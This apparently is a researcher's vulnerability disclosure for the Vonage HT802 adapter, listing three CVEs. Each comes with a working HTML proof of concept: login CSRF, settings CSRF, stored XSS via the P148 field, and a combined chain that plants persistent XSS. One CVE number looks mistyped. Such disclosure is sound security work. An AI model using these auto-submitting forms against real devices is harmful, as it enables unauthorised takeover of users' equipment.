I have disclosed three vulnerabilities in the Vonage (Grandstream) HT802. I haven’t received a response from Vonage. These vulnerabilities can be chained to inject persistent XSS in the Basic Settings screen of the device.
Update: I have the following received CVEs for these vulnerabilities:
1.) Cross-Site Request Forgery (CSRF) vulnerability in the login screen (/cgi-bin/login) allows an attacker to log into a target Vonage device. (CVE-2017-165635)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form style="visibility: hidden" id="csrf" name="loginForm" action="http://192.168.0.160/cgi-bin/dologin" method="POST"> | |
| <input name="P2" type="password" value="123"> | |
| <input type="submit" name="Login" value="Login"> | |
| <input name="gnkey" type=hidden value=0b82> | |
| </form> | |
| <script> | |
| document.getElementById("csrf").submit(); | |
| </script> | |
| </body> | |
| </html> |
POC Verified in Firefox 56.0 on macOS
2.) Cross-Site Request Forgery (CSRF) vulnerability in the Basic Settings screen allows an attacker to modify system settings. (CVE-2017-16563)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post"> | |
| <input name="P196" value=""> | |
| <input name="P901" value="80"> | |
| <input name="P8" value="0"> | |
| <input name="P146" value=""> | |
| <input name="P148" value=""> | |
| <input name="P148" value="csrf-entry" maxlength="32" size="30" type="text"> | |
| <input name="P9" value="192"> | |
| <input name="P10" value="168"> | |
| <input name="P11" value="0"> | |
| <input name="P12" value="160"> | |
| <input name="P13" value="255"> | |
| <input name="P14" value="255"> | |
| <input name="P15" value="0"> | |
| <input name="P16" value="0"> | |
| <input name="P17" value="0"> | |
| <input name="P18" value="0"> | |
| <input name="P19" value="0"> | |
| <input name="P20" value="0"> | |
| <input name="P64" value="TZG%2B6"> | |
| <input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0"> | |
| <input name="P143" value="1"> | |
| <input name="P342" value="0"> | |
| <input name="update" value="update"> | |
| <input name="gnkey" type=hidden value=0b82> | |
| </form> | |
| <script> | |
| document.getElementById("xss-form").submit() | |
| </script> | |
| </body> | |
| </html> |
POC Verified in Firefox 56.0 on macOS
3.) Stored Cross-site scripting (XSS) vulnerability in cgi-bin/config2 in Vonage HT802 allows remote authenticated users to inject arbitrary web script or HTML via the DHCP vendor class ID field (P148). (CVE-2017-16564)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post"> | |
| <input name="P196" value=""> | |
| <input name="P901" value="80"> | |
| <input name="P8" value="0"> | |
| <input name="P146" value=""> | |
| <input name="P148" value=""> | |
| <input name="P148" value=""autofocus/onfocus=alert(1)//" maxlength="32" size="30" type="text"> | |
| <input name="P9" value="192"> | |
| <input name="P10" value="168"> | |
| <input name="P11" value="0"> | |
| <input name="P12" value="160"> | |
| <input name="P13" value="255"> | |
| <input name="P14" value="255"> | |
| <input name="P15" value="0"> | |
| <input name="P16" value="0"> | |
| <input name="P17" value="0"> | |
| <input name="P18" value="0"> | |
| <input name="P19" value="0"> | |
| <input name="P20" value="0"> | |
| <input name="P64" value="TZG%2B6"> | |
| <input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0"> | |
| <input name="P143" value="1"> | |
| <input name="P342" value="0"> | |
| <input name="update" value="update"> | |
| <input name="gnkey" type=hidden value=0b82> | |
| </form> | |
| <script> | |
| document.getElementById("xss-form").submit() | |
| </script> | |
| </body> | |
| </html> |
POC Verified in Firefox 56.0 on macOS
These three vulnerabilities can be chained to inject a persistent XSS payload into the Basic Settings page.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <iframe id="csrf" src="./login-csrf.html"></iframe> | |
| <form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post"> | |
| <input name="P196" value=""> | |
| <input name="P901" value="80"> | |
| <input name="P8" value="0"> | |
| <input name="P146" value=""> | |
| <input name="P148" value=""> | |
| <input name="P148" value=""autofocus/onfocus=alert(1)//" maxlength="32" size="30" type="text"> | |
| <input name="P9" value="192"> | |
| <input name="P10" value="168"> | |
| <input name="P11" value="0"> | |
| <input name="P12" value="160"> | |
| <input name="P13" value="255"> | |
| <input name="P14" value="255"> | |
| <input name="P15" value="0"> | |
| <input name="P16" value="0"> | |
| <input name="P17" value="0"> | |
| <input name="P18" value="0"> | |
| <input name="P19" value="0"> | |
| <input name="P20" value="0"> | |
| <input name="P64" value="TZG%2B6"> | |
| <input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0"> | |
| <input name="P143" value="1"> | |
| <input name="P342" value="0"> | |
| <input name="update" value="update"> | |
| <input name="gnkey" type=hidden value=0b82> | |
| </form> | |
| <script> | |
| var frame = document.getElementById('csrf'); | |
| frame.addEventListener("load", function() { | |
| window.setTimeout(document.getElementById("xss-form").submit(),1000); | |
| }); | |
| </script> | |
| </body> | |
| </html> |
distributedcompute.com 